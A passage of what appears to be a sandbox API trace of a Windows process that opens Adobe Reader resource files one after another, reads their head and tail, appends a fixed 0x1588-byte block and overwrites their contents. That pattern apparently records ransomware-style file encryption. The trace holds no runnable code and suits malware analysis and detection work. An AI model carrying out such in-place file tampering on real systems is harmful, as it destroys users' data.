"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rus32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0115.435] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0115.435] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x8025 [0115.435] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0115.436] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.436] ReleaseMutex (hMutex=0x168) returned 1 [0115.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rus32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0115.436] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rus32.clx", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rus32.clx", lpUsedDefaultChar=0x0) returned 9 [0115.436] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0115.453] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x7025 [0115.453] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea7988, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0115.913] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x7025 [0115.914] WriteFile (in: hFile=0x1dc, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0115.914] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0115.914] WriteFile (in: hFile=0x1dc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x331f28c*=0x4000, lpOverlapped=0x0) returned 1 [0115.914] CloseHandle (hObject=0x1dc) returned 1 [0115.914] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\slo113.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\slo113.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0115.954] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0115.954] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3bfc6 [0115.954] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0115.954] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0115.954] ReleaseMutex (hMutex=0x168) returned 1 [0115.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="slo113.hsp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0115.954] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="slo113.hsp", cchWideChar=10, lpMultiByteStr=0x1f7340c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="slo113.hsp", lpUsedDefaultChar=0x0) returned 10 [0115.954] ReadFile (in: hFile=0x20c, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0115.969] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3afc6 [0115.969] ReadFile (in: hFile=0x20c, lpBuffer=0x1ea99e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea99e8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.500] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x3afc6 [0116.500] WriteFile (in: hFile=0x20c, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.501] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0116.501] WriteFile (in: hFile=0x20c, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0116.501] CloseHandle (hObject=0x20c) returned 1 [0116.502] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\spn24.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\spn24.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0116.502] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0116.503] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x33c91 [0116.503] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0116.503] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.503] ReleaseMutex (hMutex=0x168) returned 1 [0116.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="spn24.hsp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0116.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="spn24.hsp", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spn24.hsp", lpUsedDefaultChar=0x0) returned 9 [0116.503] ReadFile (in: hFile=0x20c, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x331f278*=0x8000, lpOverlapped=0x0) returned 1 [0116.518] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x32c91 [0116.518] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.605] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x32c91 [0116.605] WriteFile (in: hFile=0x20c, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.607] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0116.607] WriteFile (in: hFile=0x20c, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x331f28c*=0x8000, lpOverlapped=0x0) returned 1 [0116.607] CloseHandle (hObject=0x20c) returned 1 [0116.607] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\tur.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\tur.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0116.609] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0116.609] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2c4 [0116.609] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0116.609] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.610] ReleaseMutex (hMutex=0x168) returned 1 [0116.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tur.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0116.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tur.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac84, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tur.fca", lpUsedDefaultChar=0x0) returned 7 [0116.610] ReadFile (in: hFile=0x20c, lpBuffer=0x1ea79a8, nNumberOfBytesToRead=0x2c4, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea79a8*, lpNumberOfBytesRead=0x331f2bc*=0x2c4, lpOverlapped=0x0) returned 1 [0116.611] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0116.611] WriteFile (in: hFile=0x20c, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x84c, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x331f2d0*=0x84c, lpOverlapped=0x0) returned 1 [0116.611] CloseHandle (hObject=0x20c) returned 1 [0116.612] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\SaslPrep\\SaslPrepProfile_norm_bidi.spp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\saslprep\\saslprepprofile_norm_bidi.spp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0116.613] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0116.613] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x359c [0116.613] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0116.613] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.613] ReleaseMutex (hMutex=0x168) returned 1 [0116.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaslPrepProfile_norm_bidi.spp", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0116.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaslPrepProfile_norm_bidi.spp", cchWideChar=29, lpMultiByteStr=0x1f8fedc, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaslPrepProfile_norm_bidi.spp", lpUsedDefaultChar=0x0) returned 29 [0116.614] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.620] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x259c [0116.621] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.692] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x259c [0116.692] WriteFile (in: hFile=0x20c, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.692] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0116.693] WriteFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0116.693] CloseHandle (hObject=0x20c) returned 1 [0116.693] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Adobe\\zdingbat.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\adobe\\zdingbat.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0116.703] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0116.703] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x2e9c [0116.703] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0116.703] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.703] ReleaseMutex (hMutex=0x168) returned 1 [0116.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zdingbat.txt", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.703] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="zdingbat.txt", cchWideChar=12, lpMultiByteStr=0x1f7362c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="zdingbat.txt", lpUsedDefaultChar=0x0) returned 12 [0116.703] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.713] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1e9c [0116.714] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.739] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x1e9c [0116.740] WriteFile (in: hFile=0x20c, lpBuffer=0x2866c88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866c88*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0116.744] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0116.744] WriteFile (in: hFile=0x20c, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0116.744] CloseHandle (hObject=0x20c) returned 1 [0116.744] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\FARSI.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\farsi.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0116.746] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0116.746] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x6145 [0116.746] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0116.746] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0116.746] ReleaseMutex (hMutex=0x168) returned 1 [0116.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FARSI.TXT", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0116.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FARSI.TXT", cchWideChar=9, lpMultiByteStr=0x1f7346c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FARSI.TXT", lpUsedDefaultChar=0x0) returned 9 [0116.746] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0116.761] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5145 [0116.761] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.549] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x5145 [0117.549] WriteFile (in: hFile=0x20c, lpBuffer=0x2667898*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667898*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.549] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0117.550] WriteFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.550] CloseHandle (hObject=0x20c) returned 1 [0117.550] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\Mac\\SYMBOL.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\mac\\symbol.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0117.551] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0117.551] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x3d73 [0117.552] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0117.552] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0117.552] ReleaseMutex (hMutex=0x168) returned 1 [0117.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SYMBOL.TXT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0117.552] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SYMBOL.TXT", cchWideChar=10, lpMultiByteStr=0x1f7344c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SYMBOL.TXT", lpUsedDefaultChar=0x0) returned 10 [0117.552] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.608] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2d73 [0117.609] ReadFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0117.639] SetFilePointer (in: hFile=0x20c, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x2d73 [0117.639] WriteFile (in: hFile=0x20c, lpBuffer=0x1ea8bb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea8bb8*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0117.640] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f2bc*=0) returned 0x0 [0117.640] WriteFile (in: hFile=0x20c, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x331f28c*=0x1000, lpOverlapped=0x0) returned 1 [0117.640] CloseHandle (hObject=0x20c) returned 1 [0117.640] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 